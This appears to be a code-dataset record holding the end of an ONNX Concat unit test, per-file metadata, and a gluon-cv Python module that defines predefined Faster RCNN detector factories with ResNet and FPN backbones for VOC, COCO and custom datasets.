    stacked_cols = np.array([[1, 2, 5, 6], [3, 4, 7, 8]], dtype=np.float32)
    assert np.all(run_concat(0) == stacked_rows)
    assert np.all(run_concat(1) == stacked_cols)
    assert np.all(run_concat(-1) == stacked_cols)
    assert np.all(run_concat(-2) == stacked_rows)
def test_Concat_3d():
    """Concat of two 2x2x2 float32 constants along every axis, incl. negatives."""
    x0 = np.array([[[1, 2], [3, 4]], [[5, 6], [7, 8]]], dtype=np.float32)
    x1 = np.array([[[9, 10], [11, 12]], [[13, 14], [15, 16]]], dtype=np.float32)

    def run_concat(axis):
        # Convert a constant Concat to ONNX and execute it with no feeds.
        model = convert(OperationGraph([Concat([x0, x1], axis)]))
        outputs = onnxruntime.backend.run(model, [])
        assert len(outputs) == 1
        return outputs[0]

    along_axis0 = np.array(
        [[[1, 2], [3, 4]], [[5, 6], [7, 8]], [[9, 10], [11, 12]], [[13, 14], [15, 16]]],
        dtype=np.float32,
    )
    along_axis1 = np.array(
        [[[1, 2], [3, 4], [9, 10], [11, 12]], [[5, 6], [7, 8], [13, 14], [15, 16]]],
        dtype=np.float32,
    )
    along_axis2 = np.array(
        [[[1, 2, 9, 10], [3, 4, 11, 12]], [[5, 6, 13, 14], [7, 8, 15, 16]]],
        dtype=np.float32,
    )
    assert np.all(run_concat(0) == along_axis0)
    assert np.all(run_concat(1) == along_axis1)
    assert np.all(run_concat(2) == along_axis2)
    assert np.all(run_concat(-1) == along_axis2)
    assert np.all(run_concat(-2) == along_axis1)
    assert np.all(run_concat(-3) == along_axis0)
| 27.017937
| 88
| 0.558008
| 920
| 6,025
| 3.588043
| 0.068478
| 0.087246
| 0.076341
| 0.14541
| 0.962739
| 0.9588
| 0.94638
| 0.943956
| 0.936686
| 0.921539
| 0
| 0.107353
| 0.239336
| 6,025
| 222
| 89
| 27.13964
| 0.612917
| 0
| 0
| 0.805031
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.201258
| 1
| 0.044025
| false
| 0
| 0.025157
| 0
| 0.069182
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c0013262202fd4a1674f576fe3efcc747907a571
| 28,315
|
py
|
Python
|
gluoncv/model_zoo/rcnn/faster_rcnn/predefined_models.py
|
aptsunny/gluon-cv
|
7f050d3411b1ada7d2b9515d63b848c55139fdbb
|
[
"Apache-2.0"
] | 1
|
2020-03-18T04:19:26.000Z
|
2020-03-18T04:19:26.000Z
|
gluoncv/model_zoo/rcnn/faster_rcnn/predefined_models.py
|
aptsunny/gluon-cv
|
7f050d3411b1ada7d2b9515d63b848c55139fdbb
|
[
"Apache-2.0"
] | null | null | null |
gluoncv/model_zoo/rcnn/faster_rcnn/predefined_models.py
|
aptsunny/gluon-cv
|
7f050d3411b1ada7d2b9515d63b848c55139fdbb
|
[
"Apache-2.0"
] | null | null | null |
"""Predefined Faster RCNN Model."""
from __future__ import absolute_import
import warnings
import mxnet as mx
from mxnet.gluon import nn
from mxnet.gluon.contrib.nn import SyncBatchNorm
from ..faster_rcnn import get_faster_rcnn
from ....nn.feature import FPNFeatureExpander
# Public factory functions exported by this module (one per predefined model).
__all__ = ['faster_rcnn_resnet50_v1b_voc',
           'faster_rcnn_resnet50_v1b_coco',
           'faster_rcnn_fpn_resnet50_v1b_coco',
           'faster_rcnn_fpn_syncbn_resnet50_v1b_coco',
           'faster_rcnn_resnet50_v1b_custom',
           'faster_rcnn_resnet101_v1d_voc',
           'faster_rcnn_resnet101_v1d_coco',
           'faster_rcnn_fpn_resnet101_v1d_coco',
           'faster_rcnn_fpn_syncbn_resnet101_v1d_coco',
           'faster_rcnn_resnet101_v1d_custom']
def faster_rcnn_resnet50_v1b_voc(pretrained=False, pretrained_base=True, **kwargs):
    r"""Faster RCNN model from the paper
    "Ren, S., He, K., Girshick, R., & Sun, J. (2015). Faster r-cnn: Towards
    real-time object detection with region proposal networks"

    Parameters
    ----------
    pretrained : bool or str
        Boolean value controls whether to load the default pretrained weights for model.
        String value represents the hashtag for a certain version of pretrained weights.
    pretrained_base : bool or str, optional, default is True
        Load pretrained base network, the extra layers are randomized. Note that
        if pretrained is `True`, this has no effect.
    ctx : Context, default CPU
        The context in which to load the pretrained weights.
    root : str, default '~/.mxnet/models'
        Location for keeping the model parameters.

    Returns
    -------
    mxnet.gluon.HybridBlock
        Hybrid Faster RCNN network configured for Pascal VOC.

    Examples
    --------
    >>> model = faster_rcnn_resnet50_v1b_voc(pretrained=True)
    >>> print(model)
    """
    from ....model_zoo.resnetv1b import resnet50_v1b
    from ....data import VOCDetection
    classes = VOCDetection.CLASSES
    # Don't load base-network weights when the full pretrained model is requested.
    pretrained_base = False if pretrained else pretrained_base
    base_network = resnet50_v1b(pretrained=pretrained_base, dilated=False,
                                use_global_stats=True, **kwargs)
    # Split the backbone: conv1..layer3 into `features`, layer4 into `top_features`.
    features = nn.HybridSequential()
    top_features = nn.HybridSequential()
    for layer in ['conv1', 'bn1', 'relu', 'maxpool', 'layer1', 'layer2', 'layer3']:
        features.add(getattr(base_network, layer))
    for layer in ['layer4']:
        top_features.add(getattr(base_network, layer))
    # Regex of parameter names to train; the rest of the backbone stays frozen.
    train_patterns = '|'.join(['.*dense', '.*rpn', '.*down(2|3|4)_conv', '.*layers(2|3|4)_conv'])
    return get_faster_rcnn(
        name='resnet50_v1b', dataset='voc', pretrained=pretrained,
        features=features, top_features=top_features, classes=classes,
        short=600, max_size=1000, train_patterns=train_patterns,
        nms_thresh=0.3, nms_topk=400, post_nms=100,
        roi_mode='align', roi_size=(14, 14), strides=16, clip=None,
        rpn_channel=1024, base_size=16, scales=(2, 4, 8, 16, 32),
        ratios=(0.5, 1, 2), alloc_size=(128, 128), rpn_nms_thresh=0.7,
        rpn_train_pre_nms=12000, rpn_train_post_nms=2000,
        rpn_test_pre_nms=6000, rpn_test_post_nms=300, rpn_min_size=16,
        num_sample=128, pos_iou_thresh=0.5, pos_ratio=0.25, max_num_gt=100,
        **kwargs)
def faster_rcnn_resnet50_v1b_coco(pretrained=False, pretrained_base=True, **kwargs):
    r"""Faster RCNN model from the paper
    "Ren, S., He, K., Girshick, R., & Sun, J. (2015). Faster r-cnn: Towards
    real-time object detection with region proposal networks"

    Parameters
    ----------
    pretrained : bool or str
        Boolean value controls whether to load the default pretrained weights for model.
        String value represents the hashtag for a certain version of pretrained weights.
    pretrained_base : bool or str, optional, default is True
        Load pretrained base network, the extra layers are randomized. Note that
        if pretrained is `True`, this has no effect.
    ctx : Context, default CPU
        The context in which to load the pretrained weights.
    root : str, default '~/.mxnet/models'
        Location for keeping the model parameters.

    Returns
    -------
    mxnet.gluon.HybridBlock
        Hybrid Faster RCNN network configured for MS COCO.

    Examples
    --------
    >>> model = faster_rcnn_resnet50_v1b_coco(pretrained=True)
    >>> print(model)
    """
    from ....model_zoo.resnetv1b import resnet50_v1b
    from ....data import COCODetection
    classes = COCODetection.CLASSES
    # Don't load base-network weights when the full pretrained model is requested.
    pretrained_base = False if pretrained else pretrained_base
    base_network = resnet50_v1b(pretrained=pretrained_base, dilated=False,
                                use_global_stats=True, **kwargs)
    # Split the backbone: conv1..layer3 into `features`, layer4 into `top_features`.
    features = nn.HybridSequential()
    top_features = nn.HybridSequential()
    for layer in ['conv1', 'bn1', 'relu', 'maxpool', 'layer1', 'layer2', 'layer3']:
        features.add(getattr(base_network, layer))
    for layer in ['layer4']:
        top_features.add(getattr(base_network, layer))
    # Regex of parameter names to train; the rest of the backbone stays frozen.
    train_patterns = '|'.join(['.*dense', '.*rpn', '.*down(2|3|4)_conv', '.*layers(2|3|4)_conv'])
    return get_faster_rcnn(
        name='resnet50_v1b', dataset='coco', pretrained=pretrained,
        features=features, top_features=top_features, classes=classes,
        short=800, max_size=1333, train_patterns=train_patterns,
        nms_thresh=0.5, nms_topk=-1, post_nms=-1,
        roi_mode='align', roi_size=(14, 14), strides=16, clip=4.14,
        rpn_channel=1024, base_size=16, scales=(2, 4, 8, 16, 32),
        ratios=(0.5, 1, 2), alloc_size=(128, 128), rpn_nms_thresh=0.7,
        rpn_train_pre_nms=12000, rpn_train_post_nms=2000,
        rpn_test_pre_nms=6000, rpn_test_post_nms=1000, rpn_min_size=1,
        num_sample=128, pos_iou_thresh=0.5, pos_ratio=0.25,
        max_num_gt=100, **kwargs)
def faster_rcnn_fpn_resnet50_v1b_coco(pretrained=False, pretrained_base=True, **kwargs):
    r"""Faster RCNN model with FPN from the paper
    "Ren, S., He, K., Girshick, R., & Sun, J. (2015). Faster r-cnn: Towards
    real-time object detection with region proposal networks"
    "Lin, T., Dollar, P., Girshick, R., He, K., Hariharan, B., Belongie, S. (2016).
    Feature Pyramid Networks for Object Detection"

    Parameters
    ----------
    pretrained : bool or str
        Boolean value controls whether to load the default pretrained weights for model.
        String value represents the hashtag for a certain version of pretrained weights.
    pretrained_base : bool or str, optional, default is True
        Load pretrained base network, the extra layers are randomized. Note that
        if pretrained is `True`, this has no effect.
    ctx : Context, default CPU
        The context in which to load the pretrained weights.
    root : str, default '~/.mxnet/models'
        Location for keeping the model parameters.

    Returns
    -------
    mxnet.gluon.HybridBlock
        Hybrid Faster RCNN network with an FPN feature extractor.

    Examples
    --------
    >>> model = faster_rcnn_fpn_resnet50_v1b_coco(pretrained=True)
    >>> print(model)
    """
    from ....model_zoo.resnetv1b import resnet50_v1b
    from ....data import COCODetection
    classes = COCODetection.CLASSES
    # Don't load base-network weights when the full pretrained model is requested.
    pretrained_base = False if pretrained else pretrained_base
    base_network = resnet50_v1b(pretrained=pretrained_base, dilated=False,
                                use_global_stats=True, **kwargs)
    # Build the feature pyramid from four backbone stage outputs.
    features = FPNFeatureExpander(
        network=base_network,
        outputs=['layers1_relu8_fwd', 'layers2_relu11_fwd', 'layers3_relu17_fwd',
                 'layers4_relu8_fwd'], num_filters=[256, 256, 256, 256], use_1x1=True,
        use_upsample=True, use_elewadd=True, use_p6=True, no_bias=False, pretrained=pretrained_base)
    top_features = None
    # 2 FC layer before RCNN cls and reg
    box_features = nn.HybridSequential()
    for _ in range(2):
        box_features.add(nn.Dense(1024, weight_initializer=mx.init.Normal(0.01)))
        box_features.add(nn.Activation('relu'))
    # 'P' matches the FPN lateral/output conv parameters so they get trained too.
    train_patterns = '|'.join(
        ['.*dense', '.*rpn', '.*down(2|3|4)_conv', '.*layers(2|3|4)_conv', 'P'])
    return get_faster_rcnn(
        name='fpn_resnet50_v1b', dataset='coco', pretrained=pretrained, features=features,
        top_features=top_features, classes=classes, box_features=box_features,
        short=800, max_size=1333, min_stage=2, max_stage=6, train_patterns=train_patterns,
        nms_thresh=0.5, nms_topk=-1, post_nms=-1, roi_mode='align', roi_size=(7, 7),
        strides=(4, 8, 16, 32, 64), clip=4.14, rpn_channel=1024, base_size=16,
        scales=(2, 4, 8, 16, 32), ratios=(0.5, 1, 2), alloc_size=(384, 384),
        rpn_nms_thresh=0.7, rpn_train_pre_nms=12000, rpn_train_post_nms=2000,
        rpn_test_pre_nms=6000, rpn_test_post_nms=1000, rpn_min_size=1, num_sample=512,
        pos_iou_thresh=0.5, pos_ratio=0.25, max_num_gt=100, **kwargs)
def faster_rcnn_fpn_syncbn_resnet50_v1b_coco(pretrained=False, pretrained_base=True, num_devices=0,
                                             **kwargs):
    r"""Faster RCNN model with FPN from the paper
    "Ren, S., He, K., Girshick, R., & Sun, J. (2015). Faster r-cnn: Towards
    real-time object detection with region proposal networks"
    "Lin, T., Dollar, P., Girshick, R., He, K., Hariharan, B., Belongie, S. (2016).
    Feature Pyramid Networks for Object Detection"

    Parameters
    ----------
    pretrained : bool or str
        Boolean value controls whether to load the default pretrained weights for model.
        String value represents the hashtag for a certain version of pretrained weights.
    pretrained_base : bool or str, optional, default is True
        Load pretrained base network, the extra layers are randomized. Note that
        if pretrained is `True`, this has no effect.
    num_devices : int, default is 0
        Number of devices for sync batch norm layer. if less than 1, use all devices available.
    ctx : Context, default CPU
        The context in which to load the pretrained weights.
    root : str, default '~/.mxnet/models'
        Location for keeping the model parameters.

    Returns
    -------
    mxnet.gluon.HybridBlock
        Hybrid Faster RCNN network with FPN and synchronized batch norm.

    Examples
    --------
    >>> model = faster_rcnn_fpn_syncbn_resnet50_v1b_coco(pretrained=True)
    >>> print(model)
    """
    from ....model_zoo.resnetv1b import resnet50_v1b
    from ....data import COCODetection
    classes = COCODetection.CLASSES
    # Don't load base-network weights when the full pretrained model is requested.
    pretrained_base = False if pretrained else pretrained_base
    # Gluon SyncBatchNorm takes 'num_devices'; the symbolic variant takes 'ndev'.
    gluon_norm_kwargs = {'num_devices': num_devices} if num_devices >= 1 else {}
    base_network = resnet50_v1b(pretrained=pretrained_base, dilated=False, use_global_stats=False,
                                norm_layer=SyncBatchNorm, norm_kwargs=gluon_norm_kwargs, **kwargs)
    sym_norm_kwargs = {'ndev': num_devices} if num_devices >= 1 else {}
    # Build the feature pyramid from four backbone stage outputs.
    features = FPNFeatureExpander(
        network=base_network,
        outputs=['layers1_relu8_fwd', 'layers2_relu11_fwd', 'layers3_relu17_fwd',
                 'layers4_relu8_fwd'], num_filters=[256, 256, 256, 256], use_1x1=True,
        use_upsample=True, use_elewadd=True, use_p6=True, no_bias=True, pretrained=pretrained_base,
        norm_layer=mx.sym.contrib.SyncBatchNorm, norm_kwargs=sym_norm_kwargs)
    top_features = None
    # 1 Conv 1 FC layer before RCNN cls and reg
    box_features = nn.HybridSequential()
    box_features.add(nn.Conv2D(256, 3, padding=1, use_bias=False),
                     SyncBatchNorm(**gluon_norm_kwargs),
                     nn.Activation('relu'),
                     nn.Dense(1024, weight_initializer=mx.init.Normal(0.01)),
                     nn.Activation('relu'))
    train_patterns = '(?!.*moving)'  # excluding symbol bn moving mean and var
    return get_faster_rcnn(
        name='fpn_syncbn_resnet50_v1b', dataset='coco', pretrained=pretrained, features=features,
        top_features=top_features, classes=classes, box_features=box_features,
        short=(640, 800), max_size=1333, min_stage=2, max_stage=6, train_patterns=train_patterns,
        nms_thresh=0.5, nms_topk=-1, post_nms=-1, roi_mode='align', roi_size=(7, 7),
        strides=(4, 8, 16, 32, 64), clip=4.14, rpn_channel=256, base_size=16,
        scales=(2, 4, 8, 16, 32), ratios=(0.5, 1, 2), alloc_size=(384, 384),
        rpn_nms_thresh=0.7, rpn_train_pre_nms=12000, rpn_train_post_nms=2000,
        rpn_test_pre_nms=6000, rpn_test_post_nms=1000, rpn_min_size=1, num_sample=512,
        pos_iou_thresh=0.5, pos_ratio=0.25, max_num_gt=100, **kwargs)
def faster_rcnn_resnet50_v1b_custom(classes, transfer=None, pretrained_base=True,
                                    pretrained=False, **kwargs):
    r"""Faster RCNN model with resnet50_v1b base network on custom dataset.

    Parameters
    ----------
    classes : iterable of str
        Names of custom foreground classes. `len(classes)` is the number of foreground classes.
    transfer : str or None
        If not `None`, will try to reuse pre-trained weights from faster RCNN networks trained
        on other datasets.
    pretrained : bool or str
        Boolean value controls whether to load the default pretrained weights for model.
        String value represents the hashtag for a certain version of pretrained weights.
    pretrained_base : bool or str
        Boolean value controls whether to load the default pretrained weights for model.
        String value represents the hashtag for a certain version of pretrained weights.
    ctx : Context, default CPU
        The context in which to load the pretrained weights.
    root : str, default '~/.mxnet/models'
        Location for keeping the model parameters.

    Returns
    -------
    mxnet.gluon.HybridBlock
        Hybrid faster RCNN network.
    """
    if pretrained:
        warnings.warn("Custom models don't provide `pretrained` weights, ignored.")
    if transfer is None:
        # Build from scratch on a (possibly pretrained) resnet50_v1b backbone.
        from ....model_zoo.resnetv1b import resnet50_v1b
        base_network = resnet50_v1b(pretrained=pretrained_base, dilated=False,
                                    use_global_stats=True, **kwargs)
        features = nn.HybridSequential()
        top_features = nn.HybridSequential()
        for layer in ['conv1', 'bn1', 'relu', 'maxpool', 'layer1', 'layer2', 'layer3']:
            features.add(getattr(base_network, layer))
        for layer in ['layer4']:
            top_features.add(getattr(base_network, layer))
        train_patterns = '|'.join(['.*dense', '.*rpn', '.*down(2|3|4)_conv',
                                   '.*layers(2|3|4)_conv'])
        return get_faster_rcnn(
            name='resnet50_v1b', dataset='custom', pretrained=pretrained,
            features=features, top_features=top_features, classes=classes,
            train_patterns=train_patterns, **kwargs)
    else:
        # Transfer learning: start from a model trained on another dataset and
        # reuse weights for any classes shared with the new class list.
        from ...model_zoo import get_model
        net = get_model('faster_rcnn_resnet50_v1b_' + str(transfer), pretrained=True, **kwargs)
        reuse_classes = [x for x in classes if x in net.classes]
        net.reset_class(classes, reuse_weights=reuse_classes)
        return net
def faster_rcnn_resnet101_v1d_voc(pretrained=False, pretrained_base=True, **kwargs):
    r"""Faster RCNN model from the paper
    "Ren, S., He, K., Girshick, R., & Sun, J. (2015). Faster r-cnn: Towards
    real-time object detection with region proposal networks"

    Parameters
    ----------
    pretrained : bool, optional, default is False
        Load pretrained weights.
    pretrained_base : bool or str, optional, default is True
        Load pretrained base network, the extra layers are randomized. Note that
        if pretrained is `True`, this has no effect.
    ctx : Context, default CPU
        The context in which to load the pretrained weights.
    root : str, default '~/.mxnet/models'
        Location for keeping the model parameters.

    Returns
    -------
    mxnet.gluon.HybridBlock
        Hybrid Faster RCNN network configured for Pascal VOC.

    Examples
    --------
    >>> model = faster_rcnn_resnet101_v1d_voc(pretrained=True)
    >>> print(model)
    """
    from ....model_zoo.resnetv1b import resnet101_v1d
    from ....data import VOCDetection
    classes = VOCDetection.CLASSES
    # Don't load base-network weights when the full pretrained model is requested.
    pretrained_base = False if pretrained else pretrained_base
    base_network = resnet101_v1d(pretrained=pretrained_base, dilated=False,
                                 use_global_stats=True, **kwargs)
    # Split the backbone: conv1..layer3 into `features`, layer4 into `top_features`.
    features = nn.HybridSequential()
    top_features = nn.HybridSequential()
    for layer in ['conv1', 'bn1', 'relu', 'maxpool', 'layer1', 'layer2', 'layer3']:
        features.add(getattr(base_network, layer))
    for layer in ['layer4']:
        top_features.add(getattr(base_network, layer))
    # Regex of parameter names to train; the rest of the backbone stays frozen.
    train_patterns = '|'.join(['.*dense', '.*rpn', '.*down(2|3|4)_conv', '.*layers(2|3|4)_conv'])
    return get_faster_rcnn(
        name='resnet101_v1d', dataset='voc', pretrained=pretrained,
        features=features, top_features=top_features, classes=classes,
        short=600, max_size=1000, train_patterns=train_patterns,
        nms_thresh=0.3, nms_topk=400, post_nms=100,
        roi_mode='align', roi_size=(14, 14), strides=16, clip=None,
        rpn_channel=1024, base_size=16, scales=(2, 4, 8, 16, 32),
        ratios=(0.5, 1, 2), alloc_size=(128, 128), rpn_nms_thresh=0.7,
        rpn_train_pre_nms=12000, rpn_train_post_nms=2000,
        rpn_test_pre_nms=6000, rpn_test_post_nms=300, rpn_min_size=16,
        num_sample=128, pos_iou_thresh=0.5, pos_ratio=0.25, max_num_gt=100,
        **kwargs)
def faster_rcnn_resnet101_v1d_coco(pretrained=False, pretrained_base=True, **kwargs):
    r"""Faster RCNN model from the paper
    "Ren, S., He, K., Girshick, R., & Sun, J. (2015). Faster r-cnn: Towards
    real-time object detection with region proposal networks"

    Parameters
    ----------
    pretrained : bool, optional, default is False
        Load pretrained weights.
    pretrained_base : bool or str, optional, default is True
        Load pretrained base network, the extra layers are randomized. Note that
        if pretrained is `True`, this has no effect.
    ctx : Context, default CPU
        The context in which to load the pretrained weights.
    root : str, default '~/.mxnet/models'
        Location for keeping the model parameters.

    Examples
    --------
    >>> model = faster_rcnn_resnet101_v1d_coco(pretrained=True)
    >>> print(model)
    """
    from ....model_zoo.resnetv1b import resnet101_v1d
    from ....data import COCODetection
    classes = COCODetection.CLASSES
    # A fully pretrained detector already carries base-network weights.
    pretrained_base = False if pretrained else pretrained_base
    base_network = resnet101_v1d(pretrained=pretrained_base, dilated=False,
                                 use_global_stats=True, **kwargs)
    # conv1..layer3 -> shared stride-16 RPN features; layer4 -> per-RoI head.
    features = nn.HybridSequential()
    top_features = nn.HybridSequential()
    for layer in ['conv1', 'bn1', 'relu', 'maxpool', 'layer1', 'layer2', 'layer3']:
        features.add(getattr(base_network, layer))
    for layer in ['layer4']:
        top_features.add(getattr(base_network, layer))
    # Only parameters whose names match one of these regexes are trained.
    train_patterns = '|'.join(['.*dense', '.*rpn', '.*down(2|3|4)_conv', '.*layers(2|3|4)_conv'])
    return get_faster_rcnn(
        name='resnet101_v1d', dataset='coco', pretrained=pretrained,
        features=features, top_features=top_features, classes=classes,
        short=800, max_size=1333, train_patterns=train_patterns,
        nms_thresh=0.5, nms_topk=-1, post_nms=-1,
        roi_mode='align', roi_size=(14, 14), strides=16, clip=4.14,
        rpn_channel=1024, base_size=16, scales=(2, 4, 8, 16, 32),
        ratios=(0.5, 1, 2), alloc_size=(128, 128), rpn_nms_thresh=0.7,
        rpn_train_pre_nms=12000, rpn_train_post_nms=2000,
        rpn_test_pre_nms=6000, rpn_test_post_nms=1000, rpn_min_size=1,
        num_sample=128, pos_iou_thresh=0.5, pos_ratio=0.25, max_num_gt=100,
        **kwargs)
def faster_rcnn_fpn_resnet101_v1d_coco(pretrained=False, pretrained_base=True, **kwargs):
    r"""Faster RCNN model with FPN from the paper
    "Ren, S., He, K., Girshick, R., & Sun, J. (2015). Faster r-cnn: Towards
    real-time object detection with region proposal networks"
    "Lin, T., Dollar, P., Girshick, R., He, K., Hariharan, B., Belongie, S. (2016).
    Feature Pyramid Networks for Object Detection"

    Parameters
    ----------
    pretrained : bool or str
        Boolean value controls whether to load the default pretrained weights for model.
        String value represents the hashtag for a certain version of pretrained weights.
    pretrained_base : bool or str, optional, default is True
        Load pretrained base network, the extra layers are randomized. Note that
        if pretrained is `True`, this has no effect.
    ctx : Context, default CPU
        The context in which to load the pretrained weights.
    root : str, default '~/.mxnet/models'
        Location for keeping the model parameters.

    Examples
    --------
    >>> model = faster_rcnn_fpn_resnet101_v1d_coco(pretrained=True)
    >>> print(model)
    """
    from ....model_zoo.resnetv1b import resnet101_v1d
    from ....data import COCODetection
    classes = COCODetection.CLASSES
    # A fully pretrained detector already carries base-network weights.
    pretrained_base = False if pretrained else pretrained_base
    base_network = resnet101_v1d(pretrained=pretrained_base, dilated=False,
                                 use_global_stats=True, **kwargs)
    # Build the FPN over the last relu of each residual stage; every pyramid
    # level is reduced to 256 channels, with an extra P6 level appended.
    features = FPNFeatureExpander(
        network=base_network,
        outputs=['layers1_relu8_fwd', 'layers2_relu11_fwd', 'layers3_relu68_fwd',
                 'layers4_relu8_fwd'], num_filters=[256, 256, 256, 256], use_1x1=True,
        use_upsample=True, use_elewadd=True, use_p6=True, no_bias=False, pretrained=pretrained_base)
    # No per-RoI convolutional head: RoI features go straight to box_features.
    top_features = None
    # Two fully-connected layers before the RCNN cls and reg heads.
    box_features = nn.HybridSequential()
    for _ in range(2):
        box_features.add(nn.Dense(1024, weight_initializer=mx.init.Normal(0.01)))
        box_features.add(nn.Activation('relu'))
    # 'P' additionally matches the FPN lateral/output conv parameters.
    train_patterns = '|'.join(
        ['.*dense', '.*rpn', '.*down(2|3|4)_conv', '.*layers(2|3|4)_conv', 'P'])
    return get_faster_rcnn(
        name='fpn_resnet101_v1d', dataset='coco', pretrained=pretrained, features=features,
        top_features=top_features, classes=classes, box_features=box_features,
        short=800, max_size=1333, min_stage=2, max_stage=6, train_patterns=train_patterns,
        nms_thresh=0.5, nms_topk=-1, post_nms=-1, roi_mode='align', roi_size=(7, 7),
        strides=(4, 8, 16, 32, 64), clip=4.14, rpn_channel=1024, base_size=16,
        scales=(2, 4, 8, 16, 32), ratios=(0.5, 1, 2), alloc_size=(384, 384),
        rpn_nms_thresh=0.7, rpn_train_pre_nms=12000, rpn_train_post_nms=2000,
        rpn_test_pre_nms=6000, rpn_test_post_nms=1000, rpn_min_size=1, num_sample=512,
        pos_iou_thresh=0.5, pos_ratio=0.25, max_num_gt=100, **kwargs)
def faster_rcnn_fpn_syncbn_resnet101_v1d_coco(pretrained=False, pretrained_base=True, num_devices=0,
                                              **kwargs):
    r"""Faster RCNN model with FPN from the paper
    "Ren, S., He, K., Girshick, R., & Sun, J. (2015). Faster r-cnn: Towards
    real-time object detection with region proposal networks"
    "Lin, T., Dollar, P., Girshick, R., He, K., Hariharan, B., Belongie, S. (2016).
    Feature Pyramid Networks for Object Detection"

    Parameters
    ----------
    pretrained : bool or str
        Boolean value controls whether to load the default pretrained weights for model.
        String value represents the hashtag for a certain version of pretrained weights.
    pretrained_base : bool or str, optional, default is True
        Load pretrained base network, the extra layers are randomized. Note that
        if pretrained is `True`, this has no effect.
    num_devices : int, default is 0
        Number of devices for sync batch norm layer. if less than 1, use all devices available.
    ctx : Context, default CPU
        The context in which to load the pretrained weights.
    root : str, default '~/.mxnet/models'
        Location for keeping the model parameters.

    Examples
    --------
    >>> model = faster_rcnn_fpn_syncbn_resnet101_v1d_coco(pretrained=True)
    >>> print(model)
    """
    from ....model_zoo.resnetv1b import resnet101_v1d
    from ....data import COCODetection
    classes = COCODetection.CLASSES
    # A fully pretrained detector already carries base-network weights.
    pretrained_base = False if pretrained else pretrained_base
    # Gluon SyncBatchNorm takes 'num_devices'; only pass it when explicit.
    gluon_norm_kwargs = {'num_devices': num_devices} if num_devices >= 1 else {}
    # use_global_stats=False: batch-norm statistics keep updating during
    # training (synchronized across devices), unlike the frozen-BN variants.
    base_network = resnet101_v1d(pretrained=pretrained_base, dilated=False, use_global_stats=False,
                                 norm_layer=SyncBatchNorm, norm_kwargs=gluon_norm_kwargs, **kwargs)
    # The symbolic SyncBatchNorm used inside FPNFeatureExpander spells the
    # same option 'ndev'.
    sym_norm_kwargs = {'ndev': num_devices} if num_devices >= 1 else {}
    features = FPNFeatureExpander(
        network=base_network,
        outputs=['layers1_relu8_fwd', 'layers2_relu11_fwd', 'layers3_relu68_fwd',
                 'layers4_relu8_fwd'], num_filters=[256, 256, 256, 256], use_1x1=True,
        use_upsample=True, use_elewadd=True, use_p6=True, no_bias=True, pretrained=pretrained_base,
        norm_layer=mx.sym.contrib.SyncBatchNorm, norm_kwargs=sym_norm_kwargs)
    top_features = None
    # 4 conv+BN+relu blocks followed by 1 FC layer before RCNN cls and reg.
    box_features = nn.HybridSequential()
    for _ in range(4):
        box_features.add(nn.Conv2D(256, 3, padding=1, use_bias=False),
                         SyncBatchNorm(**gluon_norm_kwargs),
                         nn.Activation('relu'))
    box_features.add(nn.Dense(1024, weight_initializer=mx.init.Normal(0.01)),
                     nn.Activation('relu'))
    train_patterns = '(?!.*moving)'  # excluding symbol bn moving mean and var
    return get_faster_rcnn(
        name='fpn_syncbn_resnet101_v1d', dataset='coco', pretrained=pretrained, features=features,
        top_features=top_features, classes=classes, box_features=box_features,
        short=(640, 800), max_size=1333, min_stage=2, max_stage=6, train_patterns=train_patterns,
        nms_thresh=0.5, nms_topk=-1, post_nms=-1, roi_mode='align', roi_size=(7, 7),
        strides=(4, 8, 16, 32, 64), clip=4.14, rpn_channel=256, base_size=16,
        scales=(2, 4, 8, 16, 32), ratios=(0.5, 1, 2), alloc_size=(384, 384),
        rpn_nms_thresh=0.7, rpn_train_pre_nms=12000, rpn_train_post_nms=2000,
        rpn_test_pre_nms=6000, rpn_test_post_nms=1000, rpn_min_size=1, num_sample=512,
        pos_iou_thresh=0.5, pos_ratio=0.25, max_num_gt=100, **kwargs)
def faster_rcnn_resnet101_v1d_custom(classes, transfer=None, pretrained_base=True,
                                     pretrained=False, **kwargs):
    r"""Faster RCNN model with resnet101_v1d base network on custom dataset.

    Parameters
    ----------
    classes : iterable of str
        Names of custom foreground classes. `len(classes)` is the number of foreground classes.
    transfer : str or None
        If not `None`, will try to reuse pre-trained weights from faster RCNN networks trained
        on other datasets.
    pretrained_base : bool or str
        Boolean value controls whether to load the default pretrained weights for model.
        String value represents the hashtag for a certain version of pretrained weights.
    ctx : Context, default CPU
        The context in which to load the pretrained weights.
    root : str, default '~/.mxnet/models'
        Location for keeping the model parameters.

    Returns
    -------
    mxnet.gluon.HybridBlock
        Hybrid faster RCNN network.
    """
    if pretrained:
        warnings.warn("Custom models don't provide `pretrained` weights, ignored.")
    if transfer is not None:
        # Transfer learning: start from a detector trained on another dataset
        # and remap its output layer to the requested class list, reusing the
        # weights of any class names shared with the source model.
        from ....model_zoo import get_model
        net = get_model('faster_rcnn_resnet101_v1d_' + str(transfer), pretrained=True, **kwargs)
        reusable = [label for label in classes if label in net.classes]
        net.reset_class(classes, reuse_weights=reusable)
        return net
    # Fresh detector: build the backbone and split it into the shared
    # stride-16 feature extractor (conv1..layer3) and the per-RoI head (layer4).
    from ....model_zoo.resnetv1b import resnet101_v1d
    base_network = resnet101_v1d(pretrained=pretrained_base, dilated=False,
                                 use_global_stats=True, **kwargs)
    features = nn.HybridSequential()
    top_features = nn.HybridSequential()
    for stage in ('conv1', 'bn1', 'relu', 'maxpool', 'layer1', 'layer2', 'layer3'):
        features.add(getattr(base_network, stage))
    top_features.add(getattr(base_network, 'layer4'))
    # Restrict training to heads, RPN, and the later residual-stage convs.
    train_patterns = '|'.join(['.*dense', '.*rpn', '.*down(2|3|4)_conv',
                               '.*layers(2|3|4)_conv'])
    return get_faster_rcnn(
        name='resnet101_v1d', dataset='custom', pretrained=pretrained,
        features=features, top_features=top_features, classes=classes,
        train_patterns=train_patterns, **kwargs)
| 49.938272
| 100
| 0.671446
| 3,821
| 28,315
| 4.766292
| 0.071971
| 0.044586
| 0.020865
| 0.00615
| 0.985284
| 0.978146
| 0.970953
| 0.965902
| 0.964639
| 0.964639
| 0
| 0.051493
| 0.218118
| 28,315
| 566
| 101
| 50.026502
| 0.771128
| 0.3276
